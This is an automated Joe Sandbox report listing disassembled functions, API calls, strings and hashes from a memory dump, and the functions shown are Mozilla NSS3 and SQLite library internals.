Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: sqlite3_mprintf$memcpysqlite3_freesqlite3_initializestrlen
String ID: sqlite3_get_table() called with two or more incompatible queries
API String ID: 750880481-4279182443
Opcode ID: 18983bad3d825ab90670a6422491cc1f4843ea3ed0183e7597af29cb448b5ecb
Instruction ID: 5c18ee5b92bae6451606017c007ad35a4dfeed15756315ea4e1ffab71ee2f6ac
Opcode Fuzzy Hash: 18983bad3d825ab90670a6422491cc1f4843ea3ed0183e7597af29cb448b5ecb
Instruction Fuzzy Hash: 6041E271600606ABDB00CF25DA80A86B7F6FF44368F058A38EC1987B40E771F955CBD1

Function 6C718CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,6C72124D,00000001), ref: 6C718D19
EnterCriticalSection.KERNEL32(?,?,?,?,6C72124D,00000001), ref: 6C718D32
PL_ArenaRelease.NSS3(?,?,?,?,?,6C72124D,00000001), ref: 6C718D73
PR_Unlock.NSS3(?,?,?,?,?,6C72124D,00000001), ref: 6C718D8C

Part of subcall function 6C7ADD70: TlsGetValue.KERNEL32 ref: 6C7ADD8C
Part of subcall function 6C7ADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7ADDB4

PR_Unlock.NSS3(?,?,?,?,?,6C72124D,00000001), ref: 6C718DBA

Strings

KRAM, xrefs: 6C718CF9
KRAM, xrefs: 6C718D3E

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
String ID: KRAM$KRAM
API String ID: 2419422920-169145855
Opcode ID: baedbfb9f59fb870d91f60256db5a9de3a29d61986a1b8de68181c2ff33c5ac2
Instruction ID: def6ad55f5b6a3b37e1a3d91c8c216feb3e2775a3e99c10972b2f704448e6601
Opcode Fuzzy Hash: baedbfb9f59fb870d91f60256db5a9de3a29d61986a1b8de68181c2ff33c5ac2
Instruction Fuzzy Hash: AD2191B5A187018FCB40EF78C68655AB7F0FF59318F1A897AD89887B01DB34D842CB91

Function 6C73ACC0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6C73ACE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C73AD14
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C73AD23

Part of subcall function 6C81D930: PL_strncpyz.NSS3(?,?,?), ref: 6C81D963

PR_LogPrint.NSS3(?,00000000), ref: 6C73AD39

Strings

hSession = 0x%x, xrefs: 6C73ACFE, 6C73AD0E
(CK_INVALID_HANDLE), xrefs: 6C73AD1C
C_MessageDecryptFinal, xrefs: 6C73ACE1

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal
API String ID: 332880674-3521875567
Opcode ID: b058526410a79af40a8d08daf4cde5a8436a1055c74bcb6f2f9dba70f44ca2c4
Instruction ID: ba91096ebb8710047ad13aa67af530538cb319d778f51fedbfbfba61c3937249
Opcode Fuzzy Hash: b058526410a79af40a8d08daf4cde5a8436a1055c74bcb6f2f9dba70f44ca2c4
Instruction Fuzzy Hash: 5A2108306011249FDB219BA5DE4EB7A33B5AB4235EF442435E40D9BB02DB389848C7D6

Function 6C810ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C810EE6
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C810EFA

Part of subcall function 6C6FAEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C6FAF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C810F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C810F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C810F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C810F2B

Strings

Assertion failure: %s, at %s:%d, xrefs: 6C810ED9, 6C810EE5, 6C810F06, 6C810F0B
Aborting, xrefs: 6C810EB3

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 2948422844-1374795319
Opcode ID: 3abeab728d4af231d87d1429128148ee1f17e7292b85645a63158eabcf4082da
Instruction ID: 01696fc1f25c225b3055f9426565fbe6e4d81b1b3a22b709c3c169f51a17e105
Opcode Fuzzy Hash: 3abeab728d4af231d87d1429128148ee1f17e7292b85645a63158eabcf4082da
Instruction Fuzzy Hash: A501ADB5900108ABDF21AF64DC49C9B3F6DEF46268B404424FD0987A02D775E920DAE2

Function 6C7F1C40 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 45COMMON

Download Yara Rule

APIs

sqlite3_mprintf.NSS3(non-deterministic use of %s() in %s,?,a CHECK constraint,w=ol,?,?,6C6F4E1D), ref: 6C7F1C8A
sqlite3_free.NSS3(00000000), ref: 6C7F1CB6

Strings

a CHECK constraint, xrefs: 6C7F1C76, 6C7F1C81
w=ol, xrefs: 6C7F1C44
an index, xrefs: 6C7F1C67
a generated column, xrefs: 6C7F1C6C
non-deterministic use of %s() in %s, xrefs: 6C7F1C85

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: sqlite3_freesqlite3_mprintf
String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s$w=ol
API String ID: 1840970956-164381813
Opcode ID: 9eb7deb08cba97272d51b277239de5fba39c45f640ac4ded50bf9a7e513329c0
Instruction ID: 5c3fe82d884508c857933dbe296ae6098b294b3e78a8c297cc2df026ba5d5c98
Opcode Fuzzy Hash: 9eb7deb08cba97272d51b277239de5fba39c45f640ac4ded50bf9a7e513329c0
Instruction Fuzzy Hash: 750164B1A001009BD710AA68D8129B137E5EF8234CB00087DE9498BB02EB22E85BC395

Function 6C7D4D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C7D4DC3
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C7D4DE0

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C7D4DCB
misuse, xrefs: 6C7D4DD5
API call with %s database connection pointer, xrefs: 6C7D4DBD
%s at line %d of [%.10s], xrefs: 6C7D4DDA
invalid, xrefs: 6C7D4DB8

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 335e5ae5a6ed0ff5de9838da21168db2d39ea575ecd07c14a7ff553b6df72153
Instruction ID: 173aa99e844b218bcc4ddb4056221ac632ba8fc0a300d233653fa67406181ed0
Opcode Fuzzy Hash: 335e5ae5a6ed0ff5de9838da21168db2d39ea575ecd07c14a7ff553b6df72153
Instruction Fuzzy Hash: 0AF0F022A145782ADA105A54CF13F8233554F22318F072DB0EE087BB92D215A850A3C4

Function 6C7D4DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C7D4E30
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C7D4E4D

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C7D4E38
misuse, xrefs: 6C7D4E42
API call with %s database connection pointer, xrefs: 6C7D4E2A
%s at line %d of [%.10s], xrefs: 6C7D4E47
invalid, xrefs: 6C7D4E25

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 8a435e6fae31825ae79852763290c68bc253509aba9b0facaecbf31f4aced3e4
Instruction ID: b5f5c2f2d8a70600ab87453edc9b25e05d1410dbc2d1b21d170be9b7c46e4d0e
Opcode Fuzzy Hash: 8a435e6fae31825ae79852763290c68bc253509aba9b0facaecbf31f4aced3e4
Instruction Fuzzy Hash: 2DF0E211E449393BEA2012A5DF11F8337AD4B13329F0BA9F1EE0877F92D205A86062E5

Function 6C740C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(00000000,00000000,6C741444,?,00000001,?,00000000,00000000,?,?,6C741444,?,?,00000000,?,?), ref: 6C740CB3

Part of subcall function 6C7AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7AC2BF

PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C741444,?,00000001,?,00000000,00000000,?,?,6C741444,?), ref: 6C740DC1
PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C741444,?,00000001,?,00000000,00000000,?,?,6C741444,?), ref: 6C740DEC

Part of subcall function 6C760F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C702AF5,?,?,?,?,?,6C700A1B,00000000), ref: 6C760F1A
Part of subcall function 6C760F10: malloc.MOZGLUE(00000001), ref: 6C760F30
Part of subcall function 6C760F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C760F42

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C741444,?,00000001,?,00000000,00000000,?), ref: 6C740DFF
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C741444,?,00000001,?,00000000), ref: 6C740E16
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C741444,?,00000001,?,00000000,00000000,?), ref: 6C740E53
PR_GetCurrentThread.NSS3(?,?,?,?,6C741444,?,00000001,?,00000000,00000000,?,?,6C741444,?,?,00000000), ref: 6C740E65
PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C741444,?,00000001,?,00000000,00000000,?), ref: 6C740E79

Part of subcall function 6C751560: TlsGetValue.KERNEL32(00000000,?,6C720844,?), ref: 6C75157A
Part of subcall function 6C751560: EnterCriticalSection.KERNEL32(?,?,?,6C720844,?), ref: 6C75158F
Part of subcall function 6C751560: PR_Unlock.NSS3(?,?,?,?,6C720844,?), ref: 6C7515B2

Part of subcall function 6C71B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C721397,00000000,?,6C71CF93,5B5F5EC0,00000000,?,6C721397,?), ref: 6C71B1CB
Part of subcall function 6C71B1A0: free.MOZGLUE(5B5F5EC0,?,6C71CF93,5B5F5EC0,00000000,?,6C721397,?), ref: 6C71B1D2

Part of subcall function 6C7189E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C7188AE,-00000008), ref: 6C718A04
Part of subcall function 6C7189E0: EnterCriticalSection.KERNEL32(?), ref: 6C718A15
Part of subcall function 6C7189E0: memset.VCRUNTIME140(6C7188AE,00000000,00000132), ref: 6C718A27
Part of subcall function 6C7189E0: PR_Unlock.NSS3(?), ref: 6C718A35

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
String ID:
API String ID: 1601681851-0
Opcode ID: 4ce8865620eceaff0b5ebdbfb91dfbfa58f55960e494db4b2f95abdd7ec1dda0
Instruction ID: afb3b636b3bc1fceb29a5759a8868f894ed0ead2486b5534c0fe9a73a05b807c
Opcode Fuzzy Hash: 4ce8865620eceaff0b5ebdbfb91dfbfa58f55960e494db4b2f95abdd7ec1dda0
Instruction Fuzzy Hash: 5651D7F6D002105FEB00AF64DE89EAB37A8AF5521CF554474EC0597B02FB35ED1986A2

Function 6C6F6E50 Relevance: 12.2, APIs: 8, Instructions: 189COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3(?,?), ref: 6C6F6ED8
sqlite3_value_text.NSS3(?,?), ref: 6C6F6EE5
memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6C6F6FA8
sqlite3_value_text.NSS3(00000000,?), ref: 6C6F6FDB
sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6C6F6FF0
sqlite3_value_blob.NSS3(?,?), ref: 6C6F7010
sqlite3_value_blob.NSS3(?,?), ref: 6C6F701D
sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6C6F7052

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
String ID:
API String ID: 1920323672-0
Opcode ID: c1d1f2148ba4a27345a3d394b9a28ba7cf731c9d9c00df6c92d1e34a04b26439
Instruction ID: cdac4996a036c3a19ea74bd93bb09e72bb56cf3516e1cd0f73992ec3724dc722
Opcode Fuzzy Hash: c1d1f2148ba4a27345a3d394b9a28ba7cf731c9d9c00df6c92d1e34a04b26439
Instruction Fuzzy Hash: 1A619FB1E152068BEB00CB64C9406EEB7B3AF45318F284165D425ABB51E732DD17CB99

Function 6C768F80 Relevance: 12.2, APIs: 8, Instructions: 158memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,?,FFFFE005,?,6C767313), ref: 6C768FBB

Part of subcall function 6C7607B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C708298,?,?,?,6C6FFCE5,?), ref: 6C7607BF
Part of subcall function 6C7607B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7607E6
Part of subcall function 6C7607B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C76081B
Part of subcall function 6C7607B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C760825

SECOID_FindOID_Util.NSS3(?,?,?,FFFFE005,?,6C767313), ref: 6C769012
SECOID_FindOID_Util.NSS3(?,?,?,?,FFFFE005,?,6C767313), ref: 6C76903C
SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,FFFFE005,?,6C767313), ref: 6C76909E
PORT_ArenaGrow_Util.NSS3(?,?,?,00000001,?,?,?,?,?,?,FFFFE005,?,6C767313), ref: 6C7690DB
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,FFFFE005,?,6C767313), ref: 6C7690F1

Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C7610F3
Part of subcall function 6C7610C0: EnterCriticalSection.KERNEL32(?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76110C
Part of subcall function 6C7610C0: PL_ArenaAllocate.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761141
Part of subcall function 6C7610C0: PR_Unlock.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761182
Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76119C

PR_SetError.NSS3(FFFFE005,00000000,?,?,?,FFFFE005,?,6C767313), ref: 6C76906B

Part of subcall function 6C7AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7AC2BF

PR_SetError.NSS3(FFFFE005,00000000,?,FFFFE005,?,6C767313), ref: 6C769128

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Util$Error$ArenaFindValue$HashLookupTable$Alloc_AllocateCompareConstCriticalEnterGrow_Item_SectionUnlock
String ID:
API String ID: 3590961175-0
Opcode ID: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction ID: 275c215812ea02eef4ae776730a60c93ca998f6903bbef1dcbf316d29599acb0
Opcode Fuzzy Hash: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction Fuzzy Hash: 31519F71A002029BEB148F6BDE48B66B3F5AF64358F254039DD55DBF61EB32E804CB91

Function 6C719C50 Relevance: 12.1, APIs: 8, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 6C718850: calloc.MOZGLUE(00000001,00000028,00000000,?,?,6C720715), ref: 6C718859
Part of subcall function 6C718850: PR_NewLock.NSS3 ref: 6C718874
Part of subcall function 6C718850: PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6C71888D

PR_NewLock.NSS3 ref: 6C719CAD

Part of subcall function 6C7C98D0: calloc.MOZGLUE(00000001,00000084,6C6F0936,00000001,?,6C6F102C), ref: 6C7C98E5

Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07AD
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07CD
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07D6
Part of subcall function 6C6F07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C68204A), ref: 6C6F07E4
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,6C68204A), ref: 6C6F0864
Part of subcall function 6C6F07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C6F0880
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,6C68204A), ref: 6C6F08CB
Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(?,?,6C68204A), ref: 6C6F08D7
Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(?,?,6C68204A), ref: 6C6F08FB

TlsGetValue.KERNEL32 ref: 6C719CE8
EnterCriticalSection.KERNEL32(?,?,6C71ECEC,6C722FCD,00000000,?,6C722FCD,?), ref: 6C719D01
TlsGetValue.KERNEL32(?,?,?,6C71ECEC,6C722FCD,00000000,?,6C722FCD,?), ref: 6C719D38
EnterCriticalSection.KERNEL32(?,?,6C71ECEC,6C722FCD,00000000,?,6C722FCD,?), ref: 6C719D4D
PR_Unlock.NSS3 ref: 6C719D70
PR_Unlock.NSS3 ref: 6C719DC3
PR_NewLock.NSS3 ref: 6C719DDD

Part of subcall function 6C7188D0: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C720725,00000000,00000058), ref: 6C718906
Part of subcall function 6C7188D0: EnterCriticalSection.KERNEL32(?), ref: 6C71891A
Part of subcall function 6C7188D0: PL_ArenaAllocate.NSS3(?,?), ref: 6C71894A
Part of subcall function 6C7188D0: calloc.MOZGLUE(00000001,6C72072D,00000000,00000000,00000000,?,6C720725,00000000,00000058), ref: 6C718959
Part of subcall function 6C7188D0: memset.VCRUNTIME140(?,00000000,?), ref: 6C718993
Part of subcall function 6C7188D0: PR_Unlock.NSS3(?), ref: 6C7189AF

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Value$calloc$CriticalEnterLockSectionUnlock$Arena$AllocateInitPoolmemset
String ID:
API String ID: 3394263606-0
Opcode ID: 6ff5b5bdb51dcff77ae5d2ba7fbe3a6968886057a685e248a5dd4fd86369a2ee
Instruction ID: d2e74c426cf38bc6ede8cf96619a502fd68c050ad981e52b120e37d145e503cf
Opcode Fuzzy Hash: 6ff5b5bdb51dcff77ae5d2ba7fbe3a6968886057a685e248a5dd4fd86369a2ee
Instruction Fuzzy Hash: 3D519470A187059FDB00EF69C28965ABBF0BF54348F198539D8989BF11E730E845CBD1

Function 6C7488E0 Relevance: 12.1, APIs: 8, Instructions: 112COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7488FC

Part of subcall function 6C75BE30: SECOID_FindOID_Util.NSS3(6C71311B,00000000,?,6C71311B,?), ref: 6C75BE44

PORT_NewArena_Util.NSS3(00000800), ref: 6C748913

Part of subcall function 6C760FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7087ED,00000800,6C6FEF74,00000000), ref: 6C761000
Part of subcall function 6C760FF0: PR_NewLock.NSS3(?,00000800,6C6FEF74,00000000), ref: 6C761016
Part of subcall function 6C760FF0: PL_InitArenaPool.NSS3(00000000,security,6C7087ED,00000008,?,00000800,6C6FEF74,00000000), ref: 6C76102B

SEC_ASN1DecodeItem_Util.NSS3(00000000,?,6C82D864,?), ref: 6C748947

Part of subcall function 6C75E200: PR_SetError.NSS3(FFFFE009,00000000), ref: 6C75E245
Part of subcall function 6C75E200: PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C75E254

SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C74895B
